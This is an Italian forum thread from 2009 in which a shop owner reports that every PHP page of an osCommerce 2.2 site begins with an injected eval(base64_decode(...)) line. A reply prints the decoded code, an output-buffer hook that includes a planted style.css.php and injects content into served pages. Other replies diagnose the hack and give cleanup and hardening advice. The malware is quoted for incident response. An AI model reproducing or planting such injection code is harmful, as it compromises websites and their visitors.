Pagina 1 di 1
Problema sicurezza oscommerce codice malevolo
Inviato: 09/09/2009, 11:43
da giavara
Ciao ragazzi,
modificando alcune pagine di un ehop mi sono accorto che TUTTE le pagine php hanno uno strano codice all'inizio della pagine.
Ovviamente il codice è stato inserito da qualcuno ed è crittografato.
Ve lo riporto
Codice: Seleziona tutto
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3No [...........] 0=')); ?>
Se sapete cos'è, cosa causa, se è malevolo, vi prego di dirmelo...
Come fanno ad aggiungere questi codici, oscommerce è un software sicuro fino a che punto?
Grazie e ciao a tutti!
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 09/09/2009, 12:34
da dynamo
l'osc è stato sviluppato da qualcuno???
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 16/09/2009, 17:36
da giavara
no è il 2.2 normale.
In più ho fatto tante modifiche e contribution.
Sapete se oscommerce è debole di sicurezza?
Ha qualche falle????
Magari hanno inserito quel codice con dei sql injection?
Nessuno sa niente????
Grazie ciao!
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 18/09/2009, 9:51
da hsg26
oscommerce è sicuro come tutti gli altri opensource. Basta tenerlo aggiornato. leggi: RC2a.
il codice decodificato è questo:
Codice: Seleziona tutto
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/franfer/public_html/admin/includes/languages/english/modules/index/style.css.php')){include_once('/home/franfer/public_html/admin/includes/languages/english/modules/index/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 18/09/2009, 9:58
da hsg26
questo è ciò che ti è successo:
http://forums.oscommerce.com/index.php?showtopic=336693
sei stato hackerato. Cambia le password dell'ftp, controlla i permessi delle cartelle, cambia le password al database, e riparti dall'ultimo backup senza quella stringa codificata. E: aggiorna oscommerce. molto probabilmente usi una versione non aggiornata.
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 18/09/2009, 18:26
da marcus
La causa probabile di questo tipo di nuovi attacchi è una grave falla venuta fuori recentemente e di cui potete leggere i dettagli qui:
http://www.vupen.com/english/advisories/2009/2496
Possibili rimedi alternativi per questo problema:
- se non usate il file_manager.php toglietelo
- proteggete l'admin con .htaccess
- cambiate nome alla cartella admin
Saluti
Marcus
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 19/09/2009, 10:50
da marzioscaglione
marcus ha scritto:La causa probabile di questo tipo di nuovi attacchi è una grave falla venuta fuori recentemente e di cui potete leggere i dettagli qui:
http://www.vupen.com/english/advisories/2009/2496
Possibili rimedi alternativi per questo problema:
- se non usate il file_manager.php toglietelo
- proteggete l'admin con .htaccess
- cambiate nome alla cartella admin
Saluti
Marcus
Grazie per il suggerimento, ho già provveduto a cancellare il file file_manager.php .
Ringrazio ancora per il pronto supporto che date, specialmente sulla sicurezza di Oscommerce.
Saluti
Marzio
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 20/09/2009, 11:45
da giavara
Ringrazio anch'io!
Comunque ho la versione aggiornata! 2.2 Rca !!!
Può dipendere dal fatto che il sito è ospitato su server americani o è una grossa cazz**** ??
Dal codice che ha decodificato hsg26 (se spieghi come fai mi arrangio
) ho visto che si nomina il file "public_html/admin/includes/languages/english/modules/index/style.css.php"
sono andato a vedere dentro la cartella, ci dovrebbero essere solo custoumers.php e orders.php
invece ci sono:
cnf
csi
dg.php
lock
s.php
skwd
style.css.php
swf
Il file style.css.php menzionato nel codice eval di ogni pagina riporta dell'altro codice eval, come dg.php e s.php
Ora cancello tutto? meglio cancellare uno per uno tutto il codice all'inizio delle pagine?
Ora provo a leggere le pagine in inglese che mi avete sottoposto.
Grazie intanto ciao!
Andrea
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 20/09/2009, 16:38
da hsg26
confronta con un backup...così vedi quali files sono stati aggiunti.
Cambia tutte le varie password ftp e db.
in ogni caso tutti i files in qualche modo collegati con style.css.php sono da eliminare di corsa.
per decodificare, cerca in google eval 64 decoder... e trovi siti dove copiare la stringa.
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 20/09/2009, 16:46
da hsg26
x tutti:
provate ad installare queste contribution, servono tutte alla sicurezza di oscommerce:
http://forums.oscommerce.com/index.php?showtopic=313323
Re: Problema sicurezza oscommerce codice malevolo
Inviato: 21/09/2009, 4:53
da marcus
giavara ha scritto:Ringrazio anch'io!
Comunque ho la versione aggiornata! 2.2 Rca !!!
Può dipendere dal fatto che il sito è ospitato su server americani o è una grossa cazz**** ??
Il server americano non c'entra niente.
Sono affette le versioni osCommerce Online Merchant version 2.2 RC2a e precedenti.
Per ripristinare il sistema elimina tutti i files anomali e controlla anche quelli di osC che sono stati modificati.
Per questa operazione basta controllare le date di ultima modifica.
Per evitare future iniezioni di codice maligno:
- se non usi il file_manager.php toglilo oppure
- proteggi l'admin con .htaccess oppure
- cambia nome alla cartella admin
Saluti
Marcus